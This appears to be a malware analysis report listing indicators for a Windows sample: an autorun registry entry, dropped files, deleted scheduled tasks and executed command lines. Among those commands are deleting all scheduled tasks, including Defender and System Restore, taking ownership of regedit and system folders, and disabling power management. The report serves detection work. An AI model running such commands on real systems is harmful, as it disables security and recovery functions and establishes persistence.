Technical Information
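Registry autorun entry (the same value is written by the reg.exe command listed further down; the value name and target match a legitimate Windows component, so on its own this entry is a weak indicator):
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'ctfmon.exe' = '<SYSTEM32>\ctfmon.exe'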
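Files associated with the sample (the original heading is missing, so whether they were created or only referenced is inferred; svchost.cmd is the script launched by the cmd.exe command lines further down):
- <Current directory>\svchost.cmd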
- %TEMP%\exef076.tmp
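Scheduled-task definition files under <SYSTEM32>\tasks (the original heading is missing; the list is consistent with files removed by the `schtasks.exe /delete /tn * /f` command further down, which deletes every scheduled task, including the Windows Defender, System Restore and Windows Backup tasks listed here):
- <SYSTEM32>\tasks\adobe acrobat update task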
- <SYSTEM32>\tasks\microsoft\windows\shell\windowsparentalcontrols
- <SYSTEM32>\tasks\microsoft\windows\remoteassistance\remoteassistancetask
- <SYSTEM32>\tasks\microsoft\windows\registry\regidlebackup
- <SYSTEM32>\tasks\microsoft\windows\ras\mobilitymanager
- <SYSTEM32>\tasks\microsoft\windows\rac\ractask
- <SYSTEM32>\tasks\microsoft\windows\power efficiency diagnostics\analyzesystem
- <SYSTEM32>\tasks\microsoft\windows\perftrack\backgroundconfigsurveyor
- <SYSTEM32>\tasks\microsoft\windows\shell\windowsparentalcontrolsmigration
- <SYSTEM32>\tasks\microsoft\windows\offline files\logon synchronization
- <SYSTEM32>\tasks\microsoft\windows\nettrace\gathernetworkinfo
- <SYSTEM32>\tasks\microsoft\windows\multimedia\systemsoundsservice
- <SYSTEM32>\tasks\microsoft\windows\mui\lpremove
- <SYSTEM32>\tasks\microsoft\windows\mobilepc\hotstart
- <SYSTEM32>\tasks\microsoft\windows\memorydiagnostic\decompressionfailuredetector
- <SYSTEM32>\tasks\microsoft\windows\memorydiagnostic\corruptiondetector
- <SYSTEM32>\tasks\microsoft\windows\media center\updaterecordpath
- <SYSTEM32>\tasks\microsoft\windows\offline files\background synchronization
- <SYSTEM32>\tasks\microsoft\windows\sideshow\autowake
- <SYSTEM32>\tasks\microsoft\windows\sideshow\gadgetmanager
- <SYSTEM32>\tasks\microsoft\windows\sideshow\sessionagent
- <SYSTEM32>\tasks\microsoft\windows defender\mpidletask
- <SYSTEM32>\tasks\microsoft\windows\windowscolorsystem\calibration loader
- <SYSTEM32>\tasks\microsoft\windows\windowsbackup\confignotification
- <SYSTEM32>\tasks\microsoft\windows\windows media sharing\updatelibrary
- <SYSTEM32>\tasks\microsoft\windows\windows filtering platform\bfeonservicestarttypechange
- <SYSTEM32>\tasks\microsoft\windows\windows error reporting\queuereporting
- <SYSTEM32>\tasks\microsoft\windows\wdi\resolutionhost
- <SYSTEM32>\tasks\microsoft\windows\user profile service\hiveuploadtask
- <SYSTEM32>\tasks\microsoft\windows\upnp\upnphostconfig
- <SYSTEM32>\tasks\microsoft\windows\time synchronization\synchronizetime
- <SYSTEM32>\tasks\microsoft\windows\textservicesframework\msctfmonitor
- <SYSTEM32>\tasks\microsoft\windows\tcpip\ipaddressconflict2
- <SYSTEM32>\tasks\microsoft\windows\tcpip\ipaddressconflict1
- <SYSTEM32>\tasks\microsoft\windows\task manager\interactive
- <SYSTEM32>\tasks\microsoft\windows\systemrestore\sr
- <SYSTEM32>\tasks\microsoft\windows\softwareprotectionplatform\svcrestarttask
- <SYSTEM32>\tasks\microsoft\windows\sideshow\systemdataproviders
- <SYSTEM32>\tasks\microsoft\windows\media center\sqlliterecoverytask
- <SYSTEM32>\tasks\mozilla\firefox default browser agent 308046b0af4a39cb
- <SYSTEM32>\tasks\microsoft\windows\media center\reindexsearchroot
- <SYSTEM32>\tasks\microsoft\windows\media center\recordingrestart
- <SYSTEM32>\tasks\microsoft\windows\defrag\scheduleddefrag
- <SYSTEM32>\tasks\microsoft\windows\customer experience improvement program\usbceip
- <SYSTEM32>\tasks\microsoft\windows\customer experience improvement program\kernelceiptask
- <SYSTEM32>\tasks\microsoft\windows\customer experience improvement program\consolidator
- <SYSTEM32>\tasks\microsoft\windows\certificateservicesclient\usertask-roam
- <SYSTEM32>\tasks\microsoft\windows\certificateservicesclient\usertask
- <SYSTEM32>\tasks\microsoft\windows\certificateservicesclient\systemtask
- <SYSTEM32>\tasks\microsoft\windows\diagnosis\scheduled
- <SYSTEM32>\tasks\microsoft\windows\bluetooth\uninstalldevicetask
- <SYSTEM32>\tasks\microsoft\windows\application experience\programdataupdater
- <SYSTEM32>\tasks\microsoft\windows\application experience\aitagent
- <SYSTEM32>\tasks\microsoft\windows\appid\verifiedpublishercertstorecheck
- <SYSTEM32>\tasks\microsoft\windows\appid\policyconverter
- <SYSTEM32>\tasks\microsoft\windows\active directory rights management services client\ad rms rights policy template management (manual)
- <SYSTEM32>\tasks\microsoft\windows\active directory rights management services client\ad rms rights policy template management (automated)
- <SYSTEM32>\tasks\opera scheduled autoupdate 1664410416
- <SYSTEM32>\tasks\microsoft\windows\autochk\proxy
- <SYSTEM32>\tasks\microsoft\windows\diskdiagnostic\microsoft-windows-diskdiagnosticdatacollector
- <SYSTEM32>\tasks\microsoft\windows\diskdiagnostic\microsoft-windows-diskdiagnosticresolver
- <SYSTEM32>\tasks\microsoft\windows\location\notifications
- <SYSTEM32>\tasks\microsoft\windows\media center\pvrscheduletask
- <SYSTEM32>\tasks\microsoft\windows\media center\pvrrecoverytask
- <SYSTEM32>\tasks\microsoft\windows\media center\periodicscanretry
- <SYSTEM32>\tasks\microsoft\windows\media center\pbdadiscoveryw2
- <SYSTEM32>\tasks\microsoft\windows\media center\pbdadiscoveryw1
- <SYSTEM32>\tasks\microsoft\windows\media center\pbdadiscovery
- <SYSTEM32>\tasks\microsoft\windows\media center\ocurdiscovery
- <SYSTEM32>\tasks\microsoft\windows\media center\ocuractivate
- <SYSTEM32>\tasks\microsoft\windows\media center\objectstorerecoverytask
- <SYSTEM32>\tasks\microsoft\windows\media center\mediacenterrecoverytask
- <SYSTEM32>\tasks\microsoft\windows\media center\mcupdate
- <SYSTEM32>\tasks\microsoft\windows\media center\installplayready
- <SYSTEM32>\tasks\microsoft\windows\media center\ehdrminit
- <SYSTEM32>\tasks\microsoft\windows\media center\dispatchrecoverytasks
- <SYSTEM32>\tasks\microsoft\windows\media center\configureinternettimeservice
- <SYSTEM32>\tasks\microsoft\windows\media center\activatewindowssearch
- <SYSTEM32>\tasks\microsoft\windows\maintenance\winsat
- <SYSTEM32>\tasks\microsoft\windows\media center\registersearch
- <SYSTEM32>\tasks\officesoftwareprotectionplatform\svcrestarttask
Command lines executed:
- '%WINDIR%\syswow64\cmd.exe' /c ""<Current directory>\svchost.cmd"" (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""<Current directory>\svchost.cmd""
- '%WINDIR%\syswow64\icacls.exe' %WINDIR%\regedit.exe /grant administrators:F /t
- '%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\regedit.exe
- '%WINDIR%\syswow64\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v ctfmon.exe /d "<SYSTEM32>\ctfmon.exe" /f
- '%WINDIR%\syswow64\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 7516b95f-f776-4464-8c53-06167f40cc99 17aaa29b-8b43-4b94-aafe-35f64daaf1ee 0
- '%WINDIR%\syswow64\powercfg.exe' -SetDcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 7516b95f-f776-4464-8c53-06167f40cc99 17aaa29b-8b43-4b94-aafe-35f64daaf1ee 0
- '%WINDIR%\syswow64\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
- '%WINDIR%\syswow64\powercfg.exe' -SetDcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
- '%WINDIR%\syswow64\powercfg.exe' -x -hibernate-timeout-dc 0
- '%WINDIR%\syswow64\powercfg.exe' -x -standby-timeout-dc 0
- '%WINDIR%\syswow64\powercfg.exe' -x -disk-timeout-dc 0
- '%WINDIR%\syswow64\powercfg.exe' -x -monitor-timeout-dc 0
- '%WINDIR%\syswow64\powercfg.exe' -x -hibernate-timeout-ac 0
- '%WINDIR%\syswow64\powercfg.exe' -x -standby-timeout-ac 0
- '%WINDIR%\syswow64\powercfg.exe' -x -disk-timeout-ac 0
- '%WINDIR%\syswow64\powercfg.exe' -x -monitor-timeout-ac 0
- '%WINDIR%\syswow64\powercfg.exe' -s 381b4222-f694-41f0-9685-ff5bb260df2e
- '%WINDIR%\syswow64\powercfg.exe' -h off
- '%WINDIR%\syswow64\schtasks.exe' /delete /tn * /f
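The remaining takeown.exe targets are under %WINDIR%\system64, which is not a standard Windows directory (the standard ones are System32 and SysWOW64), so the existence of this path on a host is worth checking:
- '%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\system64 /r /d y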
- '%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\system64\pagefile.reg
- '%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\system64\setacl.bat